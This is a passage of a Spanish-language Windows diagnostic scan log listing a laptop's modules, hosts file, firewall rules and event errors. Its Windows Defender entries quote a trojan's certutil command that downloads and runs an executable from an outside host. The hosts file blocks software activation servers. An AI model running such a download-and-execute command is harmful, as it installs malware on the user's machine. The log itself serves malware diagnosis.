ContextMenuHandlers6: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => C:\Program Files (x86)\UltraISO\isoshl64.dll [2015-10-08] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\Drivers32: [vidc.iv50] => C:\Windows\SysWOW64\ir50_32.dll [9216 2019-03-19] (Microsoft Windows -> Microsoft Corporation)

==================== Accesos directos & WMI ========================

==================== Módulos cargados (Lista blanca) =============

2016-09-20 14:37 - 2016-07-14 09:58 - 001155072 _____ ( (Conexant Systems, Inc.) [Archivo no firmado])  [El archivo está en uso ] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll
2020-03-30 21:23 - 2020-03-30 21:23 - 000365056 _____ ( ) [Archivo no firmado] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\5d2f862c5bc737700cc9dea2a28e7513\Interop.CxHDAudioAPILib.ni.dll
2020-03-30 21:23 - 2020-03-30 21:23 - 000018944 _____ ( ) [Archivo no firmado] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\704e442e16d8b7bbf2ae8bd4b40ec52c\Interop.CxUtilSvcLib.ni.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000017920 _____ () [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\libEGL.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 003598336 _____ () [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2020-04-11 12:58 - 2019-05-28 14:06 - 001021440 _____ () [Archivo no firmado] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll
2016-09-20 14:40 - 2015-09-07 13:48 - 000025600 _____ (Realtek Semiconductor Corporation) [Archivo no firmado] C:\Program Files (x86)\REALTEK\Realtek Bluetooth\VendorCmdExport.dll
2020-04-08 15:13 - 2019-10-27 06:41 - 001631744 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\Program Files (x86)\Lenovo\VantageService\3.2.93.0\x64\SQLite.Interop.dll
2020-05-07 09:33 - 2020-04-05 18:36 - 001343488 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\SQLite.Interop.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 001441280 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\platforms\qwindows.dll
2019-08-08 19:15 - 2019-08-08 19:15 - 005999104 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 006413824 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 001141760 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000339968 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 004143104 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 003840000 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000332800 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000113152 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000349184 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 080959488 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 005622272 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000463360 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 000190464 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2019-01-08 12:43 - 2019-01-08 12:43 - 002825216 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000053760 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000059392 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000017408 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000330752 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000137216 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000090112 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2019-01-08 12:44 - 2019-01-08 12:44 - 000017920 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Lista blanca) ========

(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)

AlternateDataStreams: C:\ProgramData\Temp:2CB9631F [134]
AlternateDataStreams: C:\ProgramData\Temp:EF0F3F33 [131]

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\fnmt.es -> hxxps://fnmt.es
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\fnmt.es -> hxxp://fnmt.es
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\gob.es -> hxxps://fnmt.gob.es
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\gob.es -> hxxp://fnmt.gob.es
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\juntadeandalucia.es -> hxxps://www.juntadeandalucia.es
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\redsara.es -> hxxps://sigp-internet.redsara.es

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2015-10-30 09:24 - 2020-05-04 14:36 - 000001338 _____ C:\WINDOWS\system32\drivers\etc\hosts
0.0.0.0                   telemetry.malwarebytes.com
127.0.0.1 support.wondershare.net
127.0.0.1 www.wondershare.net
127.0.0.1 www.cbs.wondershare.com
127.0.0.1 cbs.wondershare.com
127.0.0.1 www.wondershare.com
127.0.0.1 platform.wondershare.com
0.0.0.0 track.easeus.com
0.0.0.0 update.easeus.com
0.0.0.0 activación.easeus.com
127.0.0.1                   75.126.120.203
127.0.0.1                   46.4.58.71
127.0.0.1                   46.4.62.150
127.0.0.1                   46.4.28.80

2019-05-31 20:34 - 2020-04-25 21:39 - 000000583 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
192.168.137.247 android-38093fe3d3c73ba9.mshome.net # 2020 5 6 2 19 39 10 880
192.168.137.1 LAPTOP-IUVNOHHJ.mshome.net # 2025 4 4 24 19 39 10 881

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files (x86)\Calibre2\;C:\Program Files (x86)\Windows Live\Shared
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Javi\Pictures\(07-08-22) PARIS\16082007062.jpg
DNS Servers: 8.8.4.4 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Firewall de Windows está habilitado.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\Services: avast! Firewall => 3
MSCONFIG\Services: QHActiveDefense => 2
HKLM\...\StartupApproved\StartupFolder: => "InterVideo WinCinema Manager.lnk"
HKLM\...\StartupApproved\StartupFolder: => "GV LicenseManager.lnk"
HKLM\...\StartupApproved\Run: => "LenovoUtility"
HKLM\...\StartupApproved\Run: => "cAudioFilterAgent"
HKLM\...\StartupApproved\Run: => "DAX2_APP"
HKLM\...\StartupApproved\Run: => "ForteConfig"
HKLM\...\StartupApproved\Run: => "BtServer"
HKLM\...\StartupApproved\Run: => "SmartAudio"
HKLM\...\StartupApproved\Run: => "AvastUI.exe"
HKLM\...\StartupApproved\Run: => "AVGUI.exe"
HKLM\...\StartupApproved\Run32: => "QHSafeTray"
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\StartupApproved\StartupFolder: => "Enviar a OneNote.lnk"
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\StartupApproved\Run: => "com.squirrel.WhatsApp.WhatsApp"
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\StartupApproved\Run: => "StillPaper"

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [UDP Query User{522ED478-9B96-4D03-A729-590CF982006D}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{805F294F-4398-4E33-B9BC-6B6CF5DE80B0}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe () [Archivo no firmado]
FirewallRules: [{DB6A9605-3F48-41CD-9BD7-74A316C8DF8A}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{A6217542-220B-47C8-B9E0-51EC34061DD5}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AF99BD20-8D21-47CE-A0A1-FAD2FFE8C097}] => (Allow) C:\Users\Javi\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{C9FD1A79-86F7-4F7A-95ED-5CA099DC7E46}] => (Allow) C:\Users\Javi\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{52C124DC-0E5F-4772-BBCD-7017F5E92F70}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{9FC5B586-8D40-4135-A81B-55D9D679DD08}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe () [Archivo no firmado]
FirewallRules: [{7C673D4C-B307-499C-884B-23CAF9E88301}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{408F6A44-1CE7-4B08-8F2C-571422919BAD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{D7AB6066-59C2-4C11-B465-B38453450322}C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe
FirewallRules: [TCP Query User{20CE7395-3638-4096-A338-4FD5D76BBE92}C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe
FirewallRules: [{40BC33BC-C875-41EA-9509-6331AC0F2262}] => (Allow) C:\Program Files (x86)\Nero\Nero 2017\Nero Burning ROM\nero.exe (Nero AG -> Nero AG)
FirewallRules: [{B175E7A4-20D6-4C10-8662-F2AE28FC98D2}] => (Allow) C:\Program Files (x86)\Nero\Nero 2017\Nero MediaHome\MediaHome.exe (Nero AG -> Nero AG)
FirewallRules: [{8E5356ED-1100-48E7-92AD-4026C2BF3F53}] => (Allow) C:\Program Files (x86)\Nero\Nero 2017\Nero MediaHome\NMDllHost.exe (Nero AG -> Nero AG)
FirewallRules: [{F90056CC-73AF-4F76-ACA9-99264964DC99}] => (Allow) C:\Program Files (x86)\Nero\Nero 2017\Nero Burning ROM\StartNBR.exe (Nero AG -> Nero AG)
FirewallRules: [{037CFCEF-3F9B-4FCC-8DB7-0EAD779861CA}] => (Allow) C:\Program Files (x86)\Lenovo\Connect2+\Connect2+.exe (Lenovo -> Lenovo)
FirewallRules: [{6831BBD7-AAF3-408E-B9C6-ABDD9A197750}] => (Allow) C:\Program Files (x86)\Lenovo\Connect2+\Connect2+.exe (Lenovo -> Lenovo)
FirewallRules: [{10928055-FC98-47BB-93FF-C8D060556495}] => (Allow) C:\Program Files (x86)\Lenovo\Connect2+\Connect2+.exe (Lenovo -> Lenovo)
FirewallRules: [{4B7DC6B9-FF87-4610-B9F8-549B45770C27}] => (Allow) C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\USBSetup.exe (Hewlett Packard -> Hewlett-Packard Co.)
FirewallRules: [UDP Query User{B8AEA63D-CB2D-48EA-936A-8C799B40940C}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{0F2C3010-BF6B-4844-AF84-605379D9BDBA}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{78E75B07-8E49-43E1-A0F7-25D319D77D96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{13D202EA-0A2F-48D7-A1B5-AFAE9ECB68C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{7CBAF253-F323-48C9-A4E3-E13A630218B3}C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe
FirewallRules: [UDP Query User{68776335-0227-4DF7-9D65-563661A58FA3}C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\autofirma\autofirma\jre\bin\javaw.exe
FirewallRules: [{87BD2DD5-575B-470C-BC8C-35A3649A2BB5}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> )
FirewallRules: [{A6161CBB-7008-4482-A368-4F5A3ACCE01B}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> )
FirewallRules: [{89CB88F8-7865-4DD0-926F-08E50D12247B}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{2F3DBB50-94E2-4BEC-9167-189EBAF8EF9D}] => (Allow) LPort=2869
FirewallRules: [{A4575C3E-BAA7-4054-AF3A-8A7074B7C7DE}] => (Allow) LPort=1900
FirewallRules: [{AE4606D3-1DA2-4A50-ABFA-889C26DCD0C3}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{ACF50A17-1EC0-4F37-881D-B28D99DC9FCE}C:\program files (x86)\valve\portal 2\portal2.exe] => (Block) C:\program files (x86)\valve\portal 2\portal2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{E1E6C468-E0BF-4D7D-9C3C-9BE49D72816A}C:\program files (x86)\valve\portal 2\portal2.exe] => (Block) C:\program files (x86)\valve\portal 2\portal2.exe () [Archivo no firmado]
FirewallRules: [{F875AD9D-D609-4B85-818E-A43366CF5D15}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)

==================== Puntos de Restauración =========================

09-05-2020 13:06:29 AdwCleaner_BeforeCleaning_09/05/2020_13:06:14

==================== Dispositivos defectuosos en el Administrador de dispositivos ============


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (05/10/2020 10:54:44 AM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (14516,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/10/2020 10:37:08 AM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (8156,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/10/2020 12:15:35 AM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (12528,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/09/2020 11:17:14 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (12136,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/09/2020 11:00:27 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Error al generar el contexto de activación para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Error en el archivo de manifiesto o directiva "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" en la línea 1.
La identidad de componente encontrada en el manifiesto no coincide con la del componente solicitado.
La referencia es UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
La definición es UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (05/09/2020 10:34:19 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (14228,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/09/2020 07:54:51 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7584,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (05/09/2020 07:35:45 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (9672,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.


Errores del sistema:
=============
Error: (05/10/2020 12:19:44 AM) (Source: DCOM) (EventID: 10005) (User: LAPTOP-IUVNOHHJ)
Description: Error de DCOM "1053" al intentar iniciar el servicio BcastDVRUserService_1967797 con argumentos "No disponible" para ejecutar el servidor:
Windows.Media.Capture.Internal.AppCaptureShell

Error: (05/10/2020 12:19:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Servicio de usuario de difusión y GameDVR_1967797 no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.

Error: (05/10/2020 12:19:44 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Servicio de usuario de difusión y GameDVR_1967797.

Error: (05/10/2020 12:19:44 AM) (Source: DCOM) (EventID: 10005) (User: LAPTOP-IUVNOHHJ)
Description: Error de DCOM "1053" al intentar iniciar el servicio BcastDVRUserService_1967797 con argumentos "No disponible" para ejecutar el servidor:
Windows.Media.Capture.Internal.AppCaptureShell

Error: (05/10/2020 12:19:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Servicio de usuario de difusión y GameDVR_1967797 no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.

Error: (05/10/2020 12:19:44 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Servicio de usuario de difusión y GameDVR_1967797.

Error: (05/09/2020 06:56:32 PM) (Source: DCOM) (EventID: 10005) (User: LAPTOP-IUVNOHHJ)
Description: Error de DCOM "1053" al intentar iniciar el servicio BcastDVRUserService_25a1b3 con argumentos "No disponible" para ejecutar el servidor:
Windows.Media.Capture.Internal.AppCaptureShell

Error: (05/09/2020 06:56:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Servicio de usuario de difusión y GameDVR_25a1b3 no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.


Windows Defender:
===================================
Date: 2020-05-10 11:51:56.754
Description: 
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {3745B594-B77E-45C3-9978-43DB5AAA81C1}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: LAPTOP-IUVNOHHJ\Javi

Date: 2020-05-07 10:22:05.679
Description: 
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {31F2E61A-78DA-4B3A-A8CD-E06CFF8C85FA}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: NT AUTHORITY\SYSTEM

Date: 2020-05-07 09:26:55.651
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Javi\AppData\Local\Temp\csrss\scheduled.exe
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.315.44.0, AS: 1.315.44.0, NIS: 1.315.44.0
Versión de motor: AM: 1.1.17000.7, NIS: 1.1.17000.7

Date: 2020-05-05 19:59:34.592
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Javi\AppData\Local\Temp\csrss\scheduled.exe
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.315.12.0, AS: 1.315.12.0, NIS: 1.315.12.0
Versión de motor: AM: 1.1.17000.7, NIS: 1.1.17000.7

Date: 2020-05-05 19:45:21.680
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Javi\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Javi\AppData\Local\Temp\csrss\scheduled.exe /31340
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.315.12.0, AS: 1.315.12.0, NIS: 1.315.12.0
Versión de motor: AM: 1.1.17000.7, NIS: 1.1.17000.7

Date: 2020-05-09 12:54:22.207
Description: 
Antivirus de Windows Defender encontró un error al intentar cargar la inteligencia de seguridad e intentará revertir a una versión que sepa que es correcta.
Inteligencia de seguridad intentada: Copia de seguridad
Código de error: 0x80004004
Descripción del error: Operación anulada 
Versión de inteligencia de seguridad: 1.315.187.0;1.315.187.0
Versión del motor: 1.1.17000.7

Date: 2020-05-09 12:54:13.256
Description: 
Antivirus de Windows Defender encontró un error al intentar cargar la inteligencia de seguridad e intentará revertir a una versión que sepa que es correcta.
Inteligencia de seguridad intentada: Actual
Código de error: 0x80004004
Descripción del error: Operación anulada 
Versión de inteligencia de seguridad: 1.315.242.0;1.315.242.0
Versión del motor: 1.1.17000.7

Date: 2020-05-08 12:44:43.755
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Supervisión de comportamiento
Código de error: 0x80508023
Descripción del error: El programa no encontró malware ni otro software potencialmente no deseado en este dispositivo. 
Motivo: La inteligencia de seguridad antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2020-05-05 19:54:49.346
Description: 
Antivirus de Windows Defender detectó un error al intentar actualizar la inteligencia de seguridad.
Nueva versión de inteligencia de seguridad: 
Versión anterior de inteligencia de seguridad: 1.315.12.0
Origen de actualización: Centro de protección contra malware de Microsoft
Tipo de inteligencia de seguridad: AntiVirus
Tipo de actualización: Completa
Usuario: NT AUTHORITY\Servicio de red
Versión actual del motor: 
Versión anterior del motor: 1.1.17000.7
Código de error: 0x80072ee7
Descripción del error: No se pudo resolver el nombre de servidor o su dirección 

Date: 2020-05-05 19:54:49.345
Description: 
Antivirus de Windows Defender detectó un error al intentar actualizar la inteligencia de seguridad.
Nueva versión de inteligencia de seguridad: 
Versión anterior de inteligencia de seguridad: 1.315.12.0
Origen de actualización: Centro de protección contra malware de Microsoft
Tipo de inteligencia de seguridad: AntiSpyware
Tipo de actualización: Completa
Usuario: NT AUTHORITY\Servicio de red
Versión actual del motor: 
Versión anterior del motor: 1.1.17000.7
Código de error: 0x80072ee7
Descripción del error: No se pudo resolver el nombre de servidor o su dirección 

CodeIntegrity:
===================================

Date: 2020-05-10 10:41:47.975
Description: 
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-05-10 10:33:22.914
Description: 
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-05-08 16:55:23.157
Description: 
